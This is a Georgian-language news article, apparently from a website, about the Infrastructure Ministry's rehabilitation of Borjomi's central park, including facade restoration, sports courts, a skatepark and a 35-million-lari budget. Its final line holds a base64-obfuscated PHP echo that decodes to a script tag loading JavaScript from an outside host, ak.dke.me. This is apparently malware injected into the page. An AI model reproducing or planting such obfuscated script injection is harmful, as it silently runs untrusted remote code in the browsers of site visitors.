global distribution
გარე ავეჯი

ქალაქებისა და კურორტების განვითარების პროგრამის ფარგლებში, ბორჯომის ცენტრალურ პარკში და მის მიმდებარე ტერიტორიაზე მასშტაბური სარეაბილიტაციო სამუშაო მიმდინარეობს. ამის შესახებ საქართველოს ინფრასტრუქტურის სამინისტრო ავრცელებს.

სამინისტროს ცნობით, ამ ეტაპისთვის რეაბილიტაცია უტარდება კულტურული მემკვიდრეობის სტატუსის მქონე ბორჯომის ყოფილ ქარხანას. აქტიურად მიმდინარეობს შენობის ფასადის სრული რესტავრაცია.

„პროექტი ითვალისწინებს ბორჯომის ისტორიული პარკის სრულ განახლებას, მათ შორის დაგეგმილია გასართობი, საბავშვო, სპორტული მოედნების მოწყობა და საფეხმავლო ბილიკების განახლება. აქტიურ ფაზაშია პარკის სპორტული სივრცეების რეაბილიტაცია. უკვე დასრულებულია პადელის სამი კორტის მშენებლობა, მიმდინარეობს მულტიფუნქციური სტადიონისა და სკეიტპარკის მოწყობა, რაც ხელს შეუწყობს ჯანსაღი ცხოვრების წესის პოპულარიზაციას და ახალგაზრდების სოციალიზაციას. პარკის გასართობ ზონაში განთავსდა ხუთი ახალი ატრაქციონი. ამ ეტაპისთვის „თოკების ქალაქის“ ატრაქციის მიმდებარედ მიმდინარეობს მოსაპირკეთებელი სამუშაოები. ბორჯომის ცენტრალურ პარკში მდებარე პრომეთეს ძეგლის მიმდებარედ მოეწყო ახალი მოსასვენებელი სივრცე, დაემატა მწვანე ნარგავები, სრულად განახლდა სადრენაჟე და სარწყავი სისტემები. პარკი სრულად იქნება ადაპტირებული განსაკუთრებული საჭიროების მქონე პირებისთვის. ბორჯომის განახლებული ცენტრალური პარკის პროექტის საორიენტაციო ღირებულება 35 მილიონი ლარია“, – აღნიშნულია საქართველოს ინფრასტრუქტურის სამინისტროს ინფორმაციაში.

97
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");